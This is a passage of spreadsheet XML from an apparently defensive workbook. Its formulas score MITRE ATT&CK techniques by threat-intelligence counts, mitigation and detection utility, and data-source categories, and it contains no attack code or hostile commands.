        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L289" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M289" s="37">
        <v>0</v>
      </c>
      <c r="N289" s="56">
        <v>0</v>
      </c>
      <c r="O289" s="56">
        <v>0</v>
      </c>
      <c r="P289" s="56">
        <v>0</v>
      </c>
      <c r="Q289" s="56">
        <v>0</v>
      </c>
      <c r="R289" s="57"/>
      <c r="S289" s="57">
        <v>0</v>
      </c>
      <c r="T289" s="57"/>
      <c r="U289" s="57">
        <v>0</v>
      </c>
      <c r="V289" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W289" s="37">
        <v>0</v>
      </c>
      <c r="X289" s="37">
        <v>0</v>
      </c>
      <c r="Y289" s="37">
        <v>0</v>
      </c>
      <c r="Z289" s="37">
        <v>0</v>
      </c>
      <c r="AA289" s="37">
        <v>0</v>
      </c>
      <c r="AB289" s="37">
        <v>0</v>
      </c>
      <c r="AC289" s="37" t="s">
        <v>1018</v>
      </c>
      <c r="AD289" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE289" s="37" t="str" cm="1">
        <f t="array" ref="AE289">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD289)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF289" s="37">
        <v>285</v>
      </c>
      <c r="AG289" s="37" t="str" cm="1">
        <f t="array" ref="AG289">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD289)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH289" s="37">
        <v>285</v>
      </c>
      <c r="AI289" s="37" t="str" cm="1">
        <f t="array" ref="AI289">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD289)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ289" s="37">
        <v>285</v>
      </c>
      <c r="AK289" s="37" t="str" cm="1">
        <f t="array" ref="AK289">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD289)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL289" s="37">
        <v>285</v>
      </c>
      <c r="AM289" s="37" t="str" cm="1">
        <f t="array" ref="AM289">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD289)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN289" s="37">
        <v>0</v>
      </c>
      <c r="AO289" s="37">
        <v>1</v>
      </c>
      <c r="AP289" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ289" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>38.033333333333339</v>
      </c>
      <c r="AR289" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS289" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT289" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU28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0.92936507936507939</v>
      </c>
    </row>
    <row r="290" spans="1:47" ht="34">
      <c r="A290" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B290" s="37">
        <f t="shared" si="4"/>
        <v>114.5</v>
      </c>
      <c r="C290" s="37" t="s">
        <v>1019</v>
      </c>
      <c r="D290" s="50" t="s">
        <v>1017</v>
      </c>
      <c r="E290" s="37" t="s">
        <v>1020</v>
      </c>
      <c r="F290" s="37">
        <v>1</v>
      </c>
      <c r="G290" s="37">
        <v>1</v>
      </c>
      <c r="H290" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I290" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J290" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K290" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L290" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M290" s="37">
        <v>0</v>
      </c>
      <c r="N290" s="56">
        <v>0</v>
      </c>
      <c r="O290" s="56">
        <v>0</v>
      </c>
      <c r="P290" s="56">
        <v>0</v>
      </c>
      <c r="Q290" s="56">
        <v>0</v>
      </c>
      <c r="R290" s="57"/>
      <c r="S290" s="57">
        <v>0</v>
      </c>
      <c r="T290" s="57"/>
      <c r="U290" s="57">
        <v>0</v>
      </c>
      <c r="V290" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W290" s="37">
        <v>0</v>
      </c>
      <c r="X290" s="37">
        <v>0</v>
      </c>
      <c r="Y290" s="37">
        <v>0</v>
      </c>
      <c r="Z290" s="37">
        <v>0</v>
      </c>
      <c r="AA290" s="37">
        <v>0</v>
      </c>
      <c r="AB290" s="37">
        <v>0</v>
      </c>
      <c r="AC290" s="37" t="s">
        <v>1018</v>
      </c>
      <c r="AD290" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE290" s="37" t="str" cm="1">
        <f t="array" ref="AE290">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD290)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF290" s="37">
        <v>286</v>
      </c>
      <c r="AG290" s="37" t="str" cm="1">
        <f t="array" ref="AG290">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD290)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH290" s="37">
        <v>286</v>
      </c>
      <c r="AI290" s="37" t="str" cm="1">
        <f t="array" ref="AI290">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD290)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ290" s="37">
        <v>286</v>
      </c>
      <c r="AK290" s="37" t="str" cm="1">
        <f t="array" ref="AK290">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD290)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL290" s="37">
        <v>286</v>
      </c>
      <c r="AM290" s="37" t="str" cm="1">
        <f t="array" ref="AM290">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD290)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN290" s="37">
        <v>0</v>
      </c>
      <c r="AO290" s="37">
        <v>0</v>
      </c>
      <c r="AP290" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ290" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>38.166666666666664</v>
      </c>
      <c r="AR290" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS290" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT290" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU29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91" spans="1:47" ht="51">
      <c r="A291" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B291" s="37">
        <f t="shared" si="4"/>
        <v>556.05537657142861</v>
      </c>
      <c r="C291" s="37" t="s">
        <v>1021</v>
      </c>
      <c r="D291" s="50" t="s">
        <v>1022</v>
      </c>
      <c r="E291" s="37"/>
      <c r="F291" s="37">
        <v>1</v>
      </c>
      <c r="G291" s="37">
        <v>1</v>
      </c>
      <c r="H291" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I291" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J291" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K291" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L291" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M291" s="37">
        <v>8.8708999999999996E-2</v>
      </c>
      <c r="N291" s="56">
        <v>0</v>
      </c>
      <c r="O291" s="56">
        <v>13</v>
      </c>
      <c r="P291" s="56">
        <v>2</v>
      </c>
      <c r="Q291" s="56">
        <v>11</v>
      </c>
      <c r="R291" s="57" t="s">
        <v>1023</v>
      </c>
      <c r="S291" s="57">
        <v>9</v>
      </c>
      <c r="T291" s="57" t="s">
        <v>1024</v>
      </c>
      <c r="U291" s="57">
        <v>9</v>
      </c>
      <c r="V291" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.29523823809523808</v>
      </c>
      <c r="W291" s="37">
        <v>18</v>
      </c>
      <c r="X291" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Y291" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Z291" s="37">
        <v>26</v>
      </c>
      <c r="AA291" s="37">
        <v>0.26</v>
      </c>
      <c r="AB291" s="37">
        <v>0.26</v>
      </c>
      <c r="AC291" s="37"/>
      <c r="AD291" s="50" t="s">
        <v>1025</v>
      </c>
      <c r="AE291" s="37" t="str" cm="1">
        <f t="array" ref="AE291">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD291)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF291" s="37">
        <v>287</v>
      </c>
      <c r="AG291" s="37" t="str" cm="1">
        <f t="array" ref="AG291">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD291)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH291" s="37">
        <v>287</v>
      </c>
      <c r="AI291" s="37" t="str" cm="1">
        <f t="array" ref="AI291">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD291)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ291" s="37">
        <v>287</v>
      </c>
      <c r="AK291" s="37" t="str" cm="1">
        <f t="array" ref="AK291">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD291)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL291" s="37">
        <v>287</v>
      </c>
      <c r="AM291" s="37" t="str" cm="1">
        <f t="array" ref="AM291">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD291)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN291" s="37">
        <v>0</v>
      </c>
      <c r="AO291" s="37">
        <v>1</v>
      </c>
      <c r="AP291" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ291" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>185.3517921904762</v>
      </c>
      <c r="AR291" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS291" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT291" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU29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4.4369474331065755</v>
      </c>
    </row>
    <row r="292" spans="1:47" ht="68">
      <c r="A292" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B292" s="37">
        <f t="shared" si="4"/>
        <v>930.63582409523804</v>
      </c>
      <c r="C292" s="37" t="s">
        <v>1026</v>
      </c>
      <c r="D292" s="50" t="s">
        <v>1027</v>
      </c>
      <c r="E292" s="37"/>
      <c r="F292" s="37">
        <v>2</v>
      </c>
      <c r="G292" s="37">
        <v>9</v>
      </c>
      <c r="H292" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.55000000000000004</v>
      </c>
      <c r="I292" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J292" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K292" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.9</v>
      </c>
      <c r="L292" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.9</v>
      </c>
      <c r="M292" s="37">
        <v>0</v>
      </c>
      <c r="N292" s="56">
        <v>0</v>
      </c>
      <c r="O292" s="56">
        <v>2</v>
      </c>
      <c r="P292" s="56">
        <v>4</v>
      </c>
      <c r="Q292" s="56">
        <v>2</v>
      </c>
      <c r="R292" s="57" t="s">
        <v>1028</v>
      </c>
      <c r="S292" s="57">
        <v>10</v>
      </c>
      <c r="T292" s="57" t="s">
        <v>1029</v>
      </c>
      <c r="U292" s="57">
        <v>13</v>
      </c>
      <c r="V292" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.25714295238095236</v>
      </c>
      <c r="W292" s="37">
        <v>23</v>
      </c>
      <c r="X292" s="37">
        <v>0.418182</v>
      </c>
      <c r="Y292" s="37">
        <v>0.418182</v>
      </c>
      <c r="Z292" s="37">
        <v>8</v>
      </c>
      <c r="AA292" s="37">
        <v>0.08</v>
      </c>
      <c r="AB292" s="37">
        <v>0.08</v>
      </c>
      <c r="AC292" s="37"/>
      <c r="AD292" s="50" t="s">
        <v>1030</v>
      </c>
      <c r="AE292" s="37" t="str" cm="1">
        <f t="array" ref="AE292">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD292)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF292" s="37">
        <v>288</v>
      </c>
      <c r="AG292" s="37" t="str" cm="1">
        <f t="array" ref="AG292">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD292)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH292" s="37">
        <v>288</v>
      </c>
      <c r="AI292" s="37" t="str" cm="1">
        <f t="array" ref="AI292">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD292)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ292" s="37">
        <v>288</v>
      </c>
      <c r="AK292" s="37" t="str" cm="1">
        <f t="array" ref="AK292">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD292)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL292" s="37">
        <v>288</v>
      </c>
      <c r="AM292" s="37" t="str" cm="1">
        <f t="array" ref="AM292">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD292)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN292" s="37">
        <v>0</v>
      </c>
      <c r="AO292" s="37">
        <v>1</v>
      </c>
      <c r="AP292" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ292" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>310.21194136507933</v>
      </c>
      <c r="AR292" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS292" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT292" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU29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7.4098081277399839</v>
      </c>
    </row>
    <row r="293" spans="1:47" ht="68">
      <c r="A293" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B293" s="37">
        <f t="shared" si="4"/>
        <v>225.89025580952384</v>
      </c>
      <c r="C293" s="37" t="s">
        <v>1031</v>
      </c>
      <c r="D293" s="50" t="s">
        <v>1027</v>
      </c>
      <c r="E293" s="37" t="s">
        <v>1032</v>
      </c>
      <c r="F293" s="37">
        <v>1</v>
      </c>
      <c r="G293" s="37">
        <v>1</v>
      </c>
      <c r="H293" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I293" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J293" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K293" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L293" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M293" s="37">
        <v>0</v>
      </c>
      <c r="N293" s="56">
        <v>0</v>
      </c>
      <c r="O293" s="56">
        <v>2</v>
      </c>
      <c r="P293" s="56">
        <v>0</v>
      </c>
      <c r="Q293" s="56">
        <v>0</v>
      </c>
      <c r="R293" s="57" t="s">
        <v>1033</v>
      </c>
      <c r="S293" s="57">
        <v>9</v>
      </c>
      <c r="T293" s="57"/>
      <c r="U293" s="57">
        <v>0</v>
      </c>
      <c r="V293" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.523790476190476E-2</v>
      </c>
      <c r="W293" s="37">
        <v>9</v>
      </c>
      <c r="X293" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y293" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z293" s="37">
        <v>2</v>
      </c>
      <c r="AA293" s="37">
        <v>0.02</v>
      </c>
      <c r="AB293" s="37">
        <v>0.02</v>
      </c>
      <c r="AC293" s="37"/>
      <c r="AD293" s="50" t="s">
        <v>1030</v>
      </c>
      <c r="AE293" s="37" t="str" cm="1">
        <f t="array" ref="AE293">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD293)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF293" s="37">
        <v>289</v>
      </c>
      <c r="AG293" s="37" t="str" cm="1">
        <f t="array" ref="AG293">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD293)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH293" s="37">
        <v>289</v>
      </c>
      <c r="AI293" s="37" t="str" cm="1">
        <f t="array" ref="AI293">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD293)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ293" s="37">
        <v>289</v>
      </c>
      <c r="AK293" s="37" t="str" cm="1">
        <f t="array" ref="AK293">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD293)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL293" s="37">
        <v>289</v>
      </c>
      <c r="AM293" s="37" t="str" cm="1">
        <f t="array" ref="AM293">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD293)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN293" s="37">
        <v>0</v>
      </c>
      <c r="AO293" s="37">
        <v>2</v>
      </c>
      <c r="AP293" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ293" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>75.296751936507945</v>
      </c>
      <c r="AR293" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS293" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT293" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU29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3.6331786636432351</v>
      </c>
    </row>
    <row r="294" spans="1:47" ht="51">
      <c r="A294" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B294" s="37">
        <f t="shared" si="4"/>
        <v>210.08588014285715</v>
      </c>
      <c r="C294" s="37" t="s">
        <v>1034</v>
      </c>
      <c r="D294" s="50" t="s">
        <v>1027</v>
      </c>
      <c r="E294" s="37" t="s">
        <v>1035</v>
      </c>
      <c r="F294" s="37">
        <v>1</v>
      </c>
      <c r="G294" s="37">
        <v>1</v>
      </c>
      <c r="H294" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I294" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J294" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K294" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L294" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M294" s="37">
        <v>0</v>
      </c>
      <c r="N294" s="56">
        <v>0</v>
      </c>
      <c r="O294" s="56">
        <v>0</v>
      </c>
      <c r="P294" s="56">
        <v>1</v>
      </c>
      <c r="Q294" s="56">
        <v>2</v>
      </c>
      <c r="R294" s="57" t="s">
        <v>757</v>
      </c>
      <c r="S294" s="57">
        <v>7</v>
      </c>
      <c r="T294" s="57"/>
      <c r="U294" s="57">
        <v>0</v>
      </c>
      <c r="V294" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.0952523809523808E-2</v>
      </c>
      <c r="W294" s="37">
